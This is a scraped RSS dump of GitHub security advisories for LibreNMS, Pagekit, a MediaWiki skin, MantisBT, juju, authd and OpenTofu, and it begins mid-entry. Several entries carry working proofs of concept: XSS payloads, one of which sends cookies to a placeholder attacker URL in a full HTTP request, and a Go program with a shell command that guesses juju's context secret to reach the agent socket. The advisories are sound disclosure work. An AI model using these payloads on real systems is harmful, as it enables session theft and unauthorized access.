<a href="https://github.com/librenms/librenms/blob/0e741e365aa974a74aee6b43d1b4b759158a5c7e/includes/html/forms/alert-templates.inc.php#L40">https://github.com/librenms/librenms/blob/0e741e365aa974a74aee6b43d1b4b759158a5c7e/includes/html/forms/alert-templates.inc.php#L40</a></p>
<p>Where the vulnerability is happening:<br>
<a href="https://github.com/librenms/librenms/blob/0e741e365aa974a74aee6b43d1b4b759158a5c7e/includes/html/modal/alert_template.inc.php#L205">https://github.com/librenms/librenms/blob/0e741e365aa974a74aee6b43d1b4b759158a5c7e/includes/html/modal/alert_template.inc.php#L205</a></p>
<h3>PoC</h3>
<ol>
<li>Navigate to the "Alert Templates" creation page in the LibreNMS interface.</li>
<li>In the "Name" field, input the following payload:<br>
<code class="notranslate">test1&lt;script&gt;{onerror=alert}throw 1337&lt;/script&gt;</code></li>
<li>Submit the form to create the alert template.</li>
<li>Observe that the JavaScript executes immediately, triggering an alert popup. However, this code does not persist after refreshing the page.</li>
</ol>
<h3>Impact</h3>
<p>This is a Self Cross-Site Scripting (Self-XSS) vulnerability. Although the risk is lower compared to traditional XSS, it can still be exploited through social engineering or tricking users into entering or interacting with malicious code. This can lead to unauthorized actions or data exposure in the context of the affected user's session.</p>
<h3>References</h3>
<ul>
<li><a title="GHSA-gcgp-q2jq-fw52" href="https://github.com/librenms/librenms/security/advisories/GHSA-gcgp-q2jq-fw52">GHSA-gcgp-q2jq-fw52</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/librenms/librenms/commit/f259edc19b9f0ccca484c60b1ba70a0bfff97ef5/hovercard" href="https://github.com/librenms/librenms/commit/f259edc19b9f0ccca484c60b1ba70a0bfff97ef5">librenms/librenms@<tt>f259edc</tt></a></li>
<li><a href="https://github.com/librenms/librenms/blob/0e741e365aa974a74aee6b43d1b4b759158a5c7e/includes/html/forms/alert-templates.inc.php#L40">https://github.com/librenms/librenms/blob/0e741e365aa974a74aee6b43d1b4b759158a5c7e/includes/html/forms/alert-templates.inc.php#L40</a></li>
<li><a href="https://github.com/librenms/librenms/blob/0e741e365aa974a74aee6b43d1b4b759158a5c7e/includes/html/modal/alert_template.inc.php#L205">https://github.com/librenms/librenms/blob/0e741e365aa974a74aee6b43d1b4b759158a5c7e/includes/html/modal/alert_template.inc.php#L205</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47526" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-47526</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-gcgp-q2jq-fw52</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-gcgp-q2jq-fw52</guid>
<pubDate>Tue, 01 Oct 2024 20:31:09 GMT</pubDate>
</item>
<item>
<title>LibreNMS has Stored Cross-site Scripting vulnerability in "Device Dependencies" feature</title>
<description><h3>Summary</h3>
<p>A Stored Cross-Site Scripting (XSS) vulnerability in the "Device Dependencies" feature allows authenticated users to inject arbitrary JavaScript through the device name ("hostname" parameter). This vulnerability can lead to the execution of malicious code in the context of other users' sessions, potentially compromising their accounts and allowing unauthorized actions.</p>
<h3>Details</h3>
<p>The vulnerability occurs when creating a device within LibreNMS. An attacker can inject arbitrary JavaScript into the hostname parameter. This malicious script is then executed when another user visits the device dependencies page, resulting in an automatic redirect to a website controlled by the attacker. This redirect can be used to steal session cookies or perform other malicious actions.</p>
<p>For example, the following payload can be used to exploit the vulnerability:<br>
<code class="notranslate">t'' autofocus onfocus="document.location='https://&lt;attacker_url&gt;/?c='+document.cookie"</code></p>
<p>When the device dependencies page is loaded, this payload triggers the JavaScript, causing the user's browser to redirect to the attacker's website with any non-httponly cookies in the URL.</p>
<p>The root cause of this vulnerability is the application's failure to sanitize the row.hostname value before including it in the HTML output.</p>
<p>This is evident in the following line of code:<br>
<a href="https://github.com/librenms/librenms/blob/9455173edce6971777cf6666d540eeeaf6201920/includes/html/pages/device-dependencies.inc.php#L74">https://github.com/librenms/librenms/blob/9455173edce6971777cf6666d540eeeaf6201920/includes/html/pages/device-dependencies.inc.php#L74</a></p>
<h3>PoC</h3>
<ol>
<li>Add a new device using the following payload for the hostname:<br>
<code class="notranslate">t'' autofocus onfocus="document.location='https://&lt;attacker_url&gt;/?c='+document.cookie"</code></li>
<li>Save the device.</li>
<li>Navigate to the device dependencies page.</li>
<li>Observe that the injected script executes, redirecting the user to the attacker's website with any non-httponly cookies included in the URL.</li>
</ol>
<p>Example Request:</p>
<div class="highlight highlight-source-httpspec"><pre class="notranslate"><span class="pl-k">POST</span><span class="pl-c1"> /addhost HTTP/1.1</span>
<span class="pl-s"><span class="pl-v">Host:</span> &lt;your_host&gt;</span>
<span class="pl-s"><span class="pl-v">X-Requested-With:</span> XMLHttpRequest</span>
<span class="pl-s"><span class="pl-v">Content-Type:</span> application/x-www-form-urlencoded; charset=UTF-8</span>
<span class="pl-s"><span class="pl-v">Cookie:</span> &lt;your_cookie&gt;</span>
<span class="pl-ii">_token=&lt;your_token&gt;&amp;hostname=t%27%27+autofocus+onfocus%3D%22document.location%3D%27https%3A%2F%&lt;attacker_url&gt;%2F%3Fc%3D%27%2Bdocument.cookie%22&amp;sysName=&amp;hardware=&amp;os=&amp;os_id=&amp;snmpver=v2c&amp;port=&amp;transport=udp&amp;port_assoc_mode=ifIndex&amp;community=&amp;authlevel=noAuthNoPriv&amp;authname=&amp;authpass=&amp;authalgo=SHA&amp;cryptopass=&amp;cryptoalgo=AES&amp;force_add=on&amp;Submit=</span></pre></div>
<h3>Impact</h3>
<p>It could allow authenticated users to execute arbitrary JavaScript code in the context of other users' sessions. Impacted users could have their accounts compromised, enabling the attacker to perform unauthorized actions on their behalf.</p>
<h3>References</h3>
<ul>
<li><a title="GHSA-rwwc-2v8q-gc9v" href="https://github.com/librenms/librenms/security/advisories/GHSA-rwwc-2v8q-gc9v">GHSA-rwwc-2v8q-gc9v</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/librenms/librenms/commit/36b38a50cc10d4ed16caab92bdc18ed6abac9685/hovercard" href="https://github.com/librenms/librenms/commit/36b38a50cc10d4ed16caab92bdc18ed6abac9685">librenms/librenms@<tt>36b38a5</tt></a></li>
<li><a href="https://github.com/librenms/librenms/blob/9455173edce6971777cf6666d540eeeaf6201920/includes/html/pages/device-dependencies.inc.php#L74">https://github.com/librenms/librenms/blob/9455173edce6971777cf6666d540eeeaf6201920/includes/html/pages/device-dependencies.inc.php#L74</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47527" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-47527</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-rwwc-2v8q-gc9v</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-rwwc-2v8q-gc9v</guid>
<pubDate>Tue, 01 Oct 2024 20:31:04 GMT</pubDate>
</item>
<item>
<title>Pagekit Cross-site Scripting vulnerability</title>
<description><p>Pagekit 1.0.18 is vulnerable to Cross Site Scripting (XSS) in index.php/admin/site/widget.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45967" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-45967</a></li>
<li><a href="https://github.com/yingning620/test123/blob/main/Pagekit%20CMS/Pagekit%20CMS%20v1.0.18%20%E5%AD%98%E5%82%A8%E5%9E%8BXSS.md">https://github.com/yingning620/test123/blob/main/Pagekit%20CMS/Pagekit%20CMS%20v1.0.18%20%E5%AD%98%E5%82%A8%E5%9E%8BXSS.md</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-xw32-6422-frqm</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-xw32-6422-frqm</guid>
<pubDate>Tue, 01 Oct 2024 15:32:09 GMT</pubDate>
</item>
<item>
<title>starcitizentools/citizen-skin vulnerable to stored, self-XSS in the "real name" field</title>
<description><h3>Summary</h3>
<p>A user with the <code class="notranslate">editmyprivateinfo</code> right or who can otherwise change their name can XSS themselves by setting their "real name" to an XSS payload.</p>
<h3>Details</h3>
<p>Here's the offending line:<br>
<a href="https://github.com/StarCitizenTools/mediawiki-skins-Citizen/blob/d45c3d69f30863f622f16eb40dd41d3ca943454a/includes/Components/CitizenComponentUserInfo.php#L137">https://github.com/StarCitizenTools/mediawiki-skins-Citizen/blob/d45c3d69f30863f622f16eb40dd41d3ca943454a/includes/Components/CitizenComponentUserInfo.php#L137</a></p>
<p>This was introduced in 717d16af35b10dab04d434aefddbf991fc8c168c</p>
<h3>PoC</h3>
<ol>
<li>Login</li>
<li>Go to Special:Preferences</li>
<li>Set the real name field to a string like <code class="notranslate">&lt;script&gt;alert("Admin with a propensity for self-XSSes")&lt;/script&gt;</code></li>
<li>Save your settings and use Citizen if it's not being used already</li>
</ol>
<p><a target="_blank" rel="noopener noreferrer" href="https://github.com/user-attachments/assets/22adbb70-fcd7-4f81-8e53-1f5f3a730270"><img src="https://github.com/user-attachments/assets/22adbb70-fcd7-4f81-8e53-1f5f3a730270" alt="" style="max-width: 100%;" referrerpolicy="no-referrer"></a></p>
<h3>Impact</h3>
<p>Any user who can change their name (whether it's through the editmyprivateinfo right or through other means) can add XSS payloads that trigger for themselves only.</p>
<h3>References</h3>
<ul>
<li><a title="GHSA-62r2-gcxr-426x" href="https://github.com/StarCitizenTools/mediawiki-skins-Citizen/security/advisories/GHSA-62r2-gcxr-426x">GHSA-62r2-gcxr-426x</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/StarCitizenTools/mediawiki-skins-Citizen/commit/717d16af35b10dab04d434aefddbf991fc8c168c/hovercard" href="https://github.com/StarCitizenTools/mediawiki-skins-Citizen/commit/717d16af35b10dab04d434aefddbf991fc8c168c">StarCitizenTools/mediawiki-skins-Citizen@<tt>717d16a</tt></a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/StarCitizenTools/mediawiki-skins-Citizen/commit/86da3e07718c8d8da6f4310386fef85599606f9b/hovercard" href="https://github.com/StarCitizenTools/mediawiki-skins-Citizen/commit/86da3e07718c8d8da6f4310386fef85599606f9b">StarCitizenTools/mediawiki-skins-Citizen@<tt>86da3e0</tt></a></li>
<li><a href="https://github.com/StarCitizenTools/mediawiki-skins-Citizen/blob/d45c3d69f30863f622f16eb40dd41d3ca943454a/includes/Components/CitizenComponentUserInfo.php#L137">https://github.com/StarCitizenTools/mediawiki-skins-Citizen/blob/d45c3d69f30863f622f16eb40dd41d3ca943454a/includes/Components/CitizenComponentUserInfo.php#L137</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47536" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-47536</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-62r2-gcxr-426x</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-62r2-gcxr-426x</guid>
<pubDate>Mon, 30 Sep 2024 17:48:33 GMT</pubDate>
</item>
<item>
<title>MantisBT vulnerable to information disclosure with user profiles</title>
<description><p>Using a crafted POST request, an unprivileged, registered user is able to retrieve information about other users' personal system profiles.</p>
<h3>Impact</h3>
<p>Disclosure of private system profiles: Platform, OS, OS version, Description.</p>
<h3>Patches</h3>
<p>Work in progress</p>
<h3>Workarounds</h3>
<p>None</p>
<h3>References</h3>
<p><a href="https://mantisbt.org/bugs/view.php?id=34640" rel="nofollow">https://mantisbt.org/bugs/view.php?id=34640</a></p>
<h3>References<... |
http://localhost:1200/github/advisor/data/reviewed/go - Success ✔️<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" version="2.0">
<channel>
<title>GitHub Advisory Database RSS - go - reviewed</title>
<link>https://github.com/advisories</link>
<atom:link href="http://localhost:1200/github/advisor/data/reviewed/go" rel="self" type="application/rss+xml"></atom:link>
<description>GitHub Advisory Database RSS - go - reviewed - Powered by RSSHub</description>
<generator>RSSHub</generator>
<webMaster>contact@rsshub.app (RSSHub)</webMaster>
<language>en</language>
<lastBuildDate>Sat, 05 Oct 2024 18:31:02 GMT</lastBuildDate>
<ttl>5</ttl>
<item>
<title>Vulnerable juju introspection abstract UNIX domain socket</title>
<description><h3>Impact</h3>
<p>An abstract UNIX domain socket responsible for introspection is available without authentication locally to any user with access to the network namespace where the local juju agent is running.</p>
<p>On a juju controller agent, denial of service can be performed by using the <code class="notranslate">/leases/revoke</code> endpoint. Revoking leases in juju can cause availability issues.</p>
<p>On a juju machine agent that is hosting units, disabling the unit component can be performed using the <code class="notranslate">/units</code> endpoint with a "stop" action.</p>
<h3>Patches</h3>
<p>Patch: <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/juju/juju/commit/43f0fc59790d220a457d4d305f484f62be556d3b/hovercard" href="https://github.com/juju/juju/commit/43f0fc59790d220a457d4d305f484f62be556d3b">juju/juju@<tt>43f0fc5</tt></a><br>
Patched in:</p>
<ul>
<li>3.5.4</li>
<li>3.4.6</li>
<li>3.3.7</li>
<li>3.1.10</li>
<li>2.9.51</li>
</ul>
<h3>Workarounds</h3>
<p>No workaround.</p>
<h3>References</h3>
<p><a href="https://github.com/juju/juju/blob/725800953aaa29dbeda4f806097bf838e61644dd/worker/introspection/worker.go#L125">https://github.com/juju/juju/blob/725800953aaa29dbeda4f806097bf838e61644dd/worker/introspection/worker.go#L125</a></p>
<h3>References</h3>
<ul>
<li><a title="GHSA-xwgj-vpm9-q2rq" href="https://github.com/juju/juju/security/advisories/GHSA-xwgj-vpm9-q2rq">GHSA-xwgj-vpm9-q2rq</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-8038" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-8038</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/juju/juju/commit/43f0fc59790d220a457d4d305f484f62be556d3b/hovercard" href="https://github.com/juju/juju/commit/43f0fc59790d220a457d4d305f484f62be556d3b">juju/juju@<tt>43f0fc5</tt></a></li>
<li><a href="https://github.com/juju/juju/blob/725800953aaa29dbeda4f806097bf838e61644dd/worker/introspection/worker.go#L125">https://github.com/juju/juju/blob/725800953aaa29dbeda4f806097bf838e61644dd/worker/introspection/worker.go#L125</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-xwgj-vpm9-q2rq</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-xwgj-vpm9-q2rq</guid>
<pubDate>Thu, 03 Oct 2024 16:53:26 GMT</pubDate>
</item>
<item>
<title>Vulnerable juju hook tool abstract UNIX domain socket</title>
<description><h3>Impact</h3>
<p>When combined with an attack of <code class="notranslate">JUJU_CONTEXT_ID</code>, any user on the local system with access to the default network namespace may connect to the <code class="notranslate">@/var/lib/juju/agents/unit-xxxx-yyyy/agent.socket</code> and perform actions that are normally reserved to a juju charm.</p>
<h3>Patches</h3>
<p>Patch: <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/juju/juju/commit/2f2ec128ef5a8ca81fc86ae79cfcdbab0007c206/hovercard" href="https://github.com/juju/juju/commit/2f2ec128ef5a8ca81fc86ae79cfcdbab0007c206">juju/juju@<tt>2f2ec12</tt></a><br>
Patched in:</p>
<ul>
<li>3.5.4</li>
<li>3.4.6</li>
<li>3.3.7</li>
<li>3.1.10</li>
<li>2.9.51</li>
</ul>
<h3>Workarounds</h3>
<p>No workarounds available.</p>
<h3>References</h3>
<p><a href="https://github.com/juju/juju/security/advisories/GHSA-mh98-763h-m9v4">GHSA-mh98-763h-m9v4</a><br>
<a href="https://github.com/juju/juju/blob/725800953aaa29dbeda4f806097bf838e61644dd/worker/uniter/paths.go#L222">https://github.com/juju/juju/blob/725800953aaa29dbeda4f806097bf838e61644dd/worker/uniter/paths.go#L222</a></p>
<h3>References</h3>
<ul>
<li><a title="GHSA-8v4w-f4r9-7h6x" href="https://github.com/juju/juju/security/advisories/GHSA-8v4w-f4r9-7h6x">GHSA-8v4w-f4r9-7h6x</a></li>
<li><a title="GHSA-mh98-763h-m9v4" href="https://github.com/juju/juju/security/advisories/GHSA-mh98-763h-m9v4">GHSA-mh98-763h-m9v4</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-8037" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-8037</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/juju/juju/commit/2f2ec128ef5a8ca81fc86ae79cfcdbab0007c206/hovercard" href="https://github.com/juju/juju/commit/2f2ec128ef5a8ca81fc86ae79cfcdbab0007c206">juju/juju@<tt>2f2ec12</tt></a></li>
<li><a href="https://github.com/juju/juju/blob/725800953aaa29dbeda4f806097bf838e61644dd/worker/uniter/paths.go#L222">https://github.com/juju/juju/blob/725800953aaa29dbeda4f806097bf838e61644dd/worker/uniter/paths.go#L222</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-8v4w-f4r9-7h6x</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-8v4w-f4r9-7h6x</guid>
<pubDate>Thu, 03 Oct 2024 16:53:20 GMT</pubDate>
</item>
<item>
<title>PAM module may allow accessing with the credentials of another user</title>
<description><p>Authd PAM module up to version 0.3.4 can allow broker-managed users to impersonate any other user managed by the same broker and perform any PAM operation with it, including authenticating as them.</p>
<p>This is possible using tools such as <code class="notranslate">su</code>, <code class="notranslate">sudo</code> or <code class="notranslate">ssh</code> (and potentially others) that, so far, do not ensure that the PAM user at the end of the transaction is matching the one who initiated the transaction.</p>
<p>Authd 0.3.5 fixes this by not allowing changing the user unless it was never set before in the PAM stack.</p>
<p><code class="notranslate">su</code> version that will include <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2539116222" data-permission-text="Title is private" data-url="https://github.com/util-linux/util-linux/issues/3206" data-hovercard-type="pull_request" data-hovercard-url="/util-linux/util-linux/pull/3206/hovercard" href="https://github.com/util-linux/util-linux/pull/3206">util-linux/util-linux#3206</a> will not be affected<br>
<code class="notranslate">ssh</code> version that will include <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2556379017" data-permission-text="Title is private" data-url="https://github.com/openssh/openssh-portable/issues/521" data-hovercard-type="pull_request" data-hovercard-url="/openssh/openssh-portable/pull/521/hovercard" href="https://github.com/openssh/openssh-portable/pull/521">openssh/openssh-portable#521</a> will not be affected<br>
<code class="notranslate">sudo</code> version that will include <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2560317781" data-permission-text="Title is private" data-url="https://github.com/sudo-project/sudo/issues/412" data-hovercard-type="pull_request" data-hovercard-url="/sudo-project/sudo/pull/412/hovercard" href="https://github.com/sudo-project/sudo/pull/412">sudo-project/sudo#412</a> will not be affected<br>
<code class="notranslate">login</code> not affected<br>
<code class="notranslate">passwd</code> not affected</p>
<details>
<summary>Old report</summary>
<h3>Summary</h3>
<p>An user can access as another user using its own credentials</p>
<h3>Details</h3>
<p>I feel we’ve a security issue that is due to the fact that we allow changing the user in the cases in which that’s already provided by PAM, I’ve not tested this using the entra-id broker but it’s reproducible with the example one, but unless I’m missing something it should be independent from the broker in use.</p>
<p>Basically, by going to the user selection page we allow to login as any user by entering the use own credentials.</p>
<p>See for example: <a href="https://asciinema.org/a/VIcjpDImomaGu0wxsJJxNdmlf" rel="nofollow">https://asciinema.org/a/VIcjpDImomaGu0wxsJJxNdmlf</a> or <a href="https://asciinema.org/a/CV3D1gaEhn2yclqSMKCnifYPo" rel="nofollow">https://asciinema.org/a/CV3D1gaEhn2yclqSMKCnifYPo</a></p>
<p>Basically it’s possible to logging in as <code class="notranslate">user1</code> using the credentials of <code class="notranslate">user2</code> or <code class="notranslate">user3</code>.</p>
<p>The issue doesn’t affect login or passwd, but it does affect <code class="notranslate">su</code> and <code class="notranslate">sshd</code>, since in both cases they don’t check if the <code class="notranslate">PAM_USER</code> changed before the final authentication.</p>
<p>Now, while those tools should likely be fixed to only read the PAM_USER once pam gave them the final ok, I think authd should not allow changing the user at all when it has been provided by PAM.</p>
</details>
### References
- https://github.com/ubuntu/authd/security/advisories/<a title="GHSA-x5q3-c8rm-w787" data-hovercard-type="advisory" data-hovercard-url="/advisories/GHSA-x5q3-c8rm-w787/hovercard" href="https://github.com/advisories/GHSA-x5q3-c8rm-w787">GHSA-x5q3-c8rm-w787</a>
- https://nvd.nist.gov/vuln/detail/<a title="CVE-2024-9313" data-hovercard-type="advisory" data-hovercard-url="/advisories/GHSA-x5q3-c8rm-w787/hovercard" href="https://github.com/advisories/GHSA-x5q3-c8rm-w787">CVE-2024-9313</a>
- https://github.com/ubuntu/authd/commit/63e527496b013bed46904c1c58be593c13ebdce5
- https://www.cve.org/CVERecord?id=<a title="CVE-2024-9313" data-hovercard-type="advisory" data-hovercard-url="/advisories/GHSA-x5q3-c8rm-w787/hovercard" href="https://github.com/advisories/GHSA-x5q3-c8rm-w787">CVE-2024-9313</a>
</description>
<link>https://github.com/advisories/GHSA-x5q3-c8rm-w787</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-x5q3-c8rm-w787</guid>
<pubDate>Thu, 03 Oct 2024 16:53:07 GMT</pubDate>
</item>
<item>
<title>OpenTofu potential leaking of secret variable values when using static evaluation in v1.8</title>
<description><h3>Impact</h3>
<p>Users who have opted into static evaluation of module sources, versions, and backend configurations may be at risk of exposing sensitive variables and locals. This is a workflow that should not be possible and explicitly show errors.</p>
<h3>Workarounds</h3>
<p>Check that you are not using sensitive variables in module sources and versions, as well as backend configurations. The patch will add explicit errors and prevent this from being possible.</p>
<h3>Examples</h3>
<div class="highlight highlight-source-hcl"><pre class="notranslate"><span class="pl-en">variable</span> <span class="pl-smi">"backend_path"</span> {
<span class="pl-v"><span class="pl-smi">type</span> <span class="pl-k">=</span> </span><span class="pl-k">string</span>
<span class="pl-v"><span class="pl-smi">sensitive</span> <span class="pl-k">=</span> </span><span class="pl-c1">true</span>
}
<span class="pl-en">terraform</span> {
<span class="pl-en">backend</span> <span class="pl-smi">"local"</span> {
<span class="pl-v"><span class="pl-smi">path</span> <span class="pl-k">=</span> </span>var<span class="pl-k">.</span><span class="pl-smi">backend_path</span>
}
}</pre></div>
<div class="highlight highlight-source-hcl"><pre class="notranslate"><span class="pl-en">variable</span> <span class="pl-smi">"mod_info"</span> {
<span class="pl-v"><span class="pl-smi">type</span> <span class="pl-k">=</span> </span><span class="pl-k">string</span>
<span class="pl-v"><span class="pl-smi">sensitive</span> <span class="pl-k">=</span> </span><span class="pl-c1">true</span>
}
<span class="pl-en">module</span> <span class="pl-smi">"foo"</span> {
<span class="pl-v"><span class="pl-smi">source</span> <span class="pl-k">=</span> </span>var<span class="pl-k">.</span><span class="pl-smi">mod_info</span>
<span class="pl-c"><span class="pl-c">//</span>version = var.mod_info<span class="pl-c"></span></span>
}</pre></div>
<h3>References</h3>
<ul>
<li><a title="GHSA-wpr2-j6gr-pjw9" href="https://github.com/opentofu/opentofu/security/advisories/GHSA-wpr2-j6gr-pjw9">GHSA-wpr2-j6gr-pjw9</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-wpr2-j6gr-pjw9</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-wpr2-j6gr-pjw9</guid>
<pubDate>Thu, 03 Oct 2024 16:51:50 GMT</pubDate>
</item>
<item>
<title>JUJU_CONTEXT_ID is a predictable authentication secret</title>
<description><p><code class="notranslate">JUJU_CONTEXT_ID</code> is the authentication measure on the unit hook tool abstract domain socket. It looks like <code class="notranslate">JUJU_CONTEXT_ID=appname/0-update-status-6073989428498739633</code>.</p>
<p>This value looks fairly unpredictable, but due to the random source used, it is highly predictable.</p>
<p><code class="notranslate">JUJU_CONTEXT_ID</code> has the following components:</p>
<ul>
<li>the application name</li>
<li>the unit number</li>
<li>the hook being currently run</li>
<li>a uint63 decimal number</li>
</ul>
<p>On a system the application name and unit number can be deduced by reading the structure of the filesystem.<br>
The current hook being run is not easily deduce-able, but is a limited set of possible values, so one could try them all.<br>
Finally the random number, this is generated from a non cryptographically secure random source. Specifically the random number generator built into the go standard library, using the current unix time in seconds (at startup) as the seed.</p>
<p>There is no rate limiting on the abstract domain socket, the only limiting factor is time (window of time the hook is run) and memory (how much memory is available to facilitate all the connections).</p>
<h3>Impact</h3>
<p>On a juju machine (non-kubernetes) or juju charm container (on kubernetes), an unprivileged user in the same network namespace can connect to an abstract domain socket and guess the JUJU_CONTEXT_ID value. This gives the unprivileged user access to the same information and tools as the juju charm. This information could be secrets that give broader access.</p>
<h3>Patches</h3>
<p>Patch: <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/juju/juju/commit/ecd7e2d0e9867576b9da04871e22232f06fa0cc7/hovercard" href="https://github.com/juju/juju/commit/ecd7e2d0e9867576b9da04871e22232f06fa0cc7">juju/juju@<tt>ecd7e2d</tt></a><br>
Patched in:</p>
<ul>
<li>3.5.4</li>
<li>3.4.6</li>
<li>3.3.7</li>
<li>3.1.10</li>
<li>2.9.51</li>
</ul>
<h3>Workarounds</h3>
<p>No workaround. Upgrade will be required.</p>
<h3>References</h3>
<p><a href="https://github.com/juju/juju/blob/a5b7876263365977bd3e583f5325facdae73fbe4/worker/uniter/runner/context/contextfactory.go#L152">https://github.com/juju/juju/blob/a5b7876263365977bd3e583f5325facdae73fbe4/worker/uniter/runner/context/contextfactory.go#L152</a><br>
<a href="https://github.com/juju/juju/blob/a5b7876263365977bd3e583f5325facdae73fbe4/worker/uniter/runner/context/contextfactory.go#L164">https://github.com/juju/juju/blob/a5b7876263365977bd3e583f5325facdae73fbe4/worker/uniter/runner/context/contextfactory.go#L164</a></p>
<h3>PoC</h3>
<p>With a contrived example, a charm that sleeps indefinitely on its first hook, install. This charm is called sleepy.</p>
<pre class="notranslate"><code class="notranslate">.
|-- hooks
| `-- install
#!/bin/sh
sleep 10000
|-- manifest.yaml
bases:
- name: ubuntu
channel: 22.04/stable
architectures:
- amd64
|-- metadata.yaml
name: sleepy
summary: a sleepy charm
description: a sleepy charm that sleeps on install
`-- revision
1
</code></pre>
<p>With sleepy deployed into a model, we have a unit with the name <code class="notranslate">sleepy/0</code> and an tag of <code class="notranslate">unit-sleepy-0</code>.</p>
<p>With access to the log file we can very quickly get the start time of the unit:</p>
<pre class="notranslate"><code class="notranslate">ubuntu@juju-5e40c0-0:~$ cat /var/log/juju/unit-sleepy-0.log | grep 'unit "sleepy/0" started'
2024-08-06 05:10:07 INFO juju.worker.uniter uniter.go:363 unit "sleepy/0" started
</code></pre>
<p>If we don't have access to the log, we could get pretty close by trying every second between when log file was created and now:</p>
<pre class="notranslate"><code class="notranslate">nobody@juju-5e40c0-0:/var/log/juju$ cat unit-sleepy-0.log
cat: unit-sleepy-0.log: Permission denied
nobody@juju-5e40c0-0:/var/log/juju$ stat unit-sleepy-0.log
File: unit-sleepy-0.log
Size: 1403 Blocks: 8 IO Block: 4096 regular file
Device: 10302h/66306dInode: 25967076 Links: 1
Access: (0640/-rw-r-----) Uid: ( 104/ syslog) Gid: ( 4/ adm)
Access: 2024-08-06 05:10:48.686975042 +0000
Modify: 2024-08-06 05:10:07.159133215 +0000
Change: 2024-08-06 05:10:07.159133215 +0000
Birth: 2024-08-06 05:10:06.965129276 +0000
</code></pre>
<p>We can then pass that into this program:</p>
<pre class="notranslate"><code class="notranslate">package main
import (
"flag"
"fmt"
"math/rand"
"time"
)
func main() {
var unitName string
var unitStartLogTime string
var currentHook string
flag.StringVar(&amp;unitName, "u", "sleepy/0", "")
flag.StringVar(&amp;unitStartLogTime, "t", "2024-08-06 05:10:07", "time when the last 'INFO juju.worker.uniter uniter.go:363 unit %q started' log was written to /var/log/juju/unit-name-0.log")
flag.StringVar(&amp;currentHook, "h", "install", "the current hook that is running right now")
flag.Parse()
t, err := time.Parse("2006-01-02 15:04:05", unitStartLogTime)
if err != nil {
panic(err)
}
sources := []rand.Source{
rand.NewSource(t.Unix()),
rand.NewSource(t.Unix() - 1),
rand.NewSource(t.Unix() - 2),
}
for i := 0; i &lt; 10; i++ {
for _, source := range sources {
fmt.Printf("%s-%s-%d\n", unitName, currentHook, source.Int63())
}
}
}
</code></pre>
<p>This program will give us a list of <code class="notranslate">JUJU_CONTEXT_ID</code>s to try. We just need to try each one. In this case it was the first one, because we had enough information.</p>
<pre class="notranslate"><code class="notranslate">$ go run . -u sleepy/0 -t "2024-08-06 05:10:07" -h install
sleepy/0-install-7349430268617352851
sleepy/0-install-2171542415131519293
sleepy/0-install-6564961386023494624
sleepy/0-install-59904244413115609
sleepy/0-install-6073989428498739633
sleepy/0-install-2504995199508561544
sleepy/0-install-1526670560532335303
sleepy/0-install-2568216045630615950
sleepy/0-install-8047402353801897930
</code></pre>
<p>Unfortunately, this worked too well.</p>
<pre class="notranslate"><code class="notranslate">nobody@juju-5e40c0-0:/var/log/juju$ JUJU_AGENT_SOCKET_NETWORK=unix JUJU_AGENT_SOCKET_ADDRESS=@/var/lib/juju/agents/unit-sleepy-0/agent.socket JUJU_CONTEXT_ID=sleepy/0-install-7349430268617352851 /var/lib/juju/tools/unit-sleepy-0/is-leader
True
</code></pre>
<p>With a more sophisticated attack, this could discover all the units on the machine, using the update-status hook, try a few thousand attempts per second to guess the start time and the current offset in the random source, then using secret-get hook tool, get some sort of secret, such as credentials to a system.</p>
<h3>References</h3>
<ul>
<li><a title="GHSA-mh98-763h-m9v4" href="https://github.com/juju/juju/security/advisories/GHSA-mh98-763h-m9v4">GHSA-mh98-763h-m9v4</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-7558" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-7558</a></li>
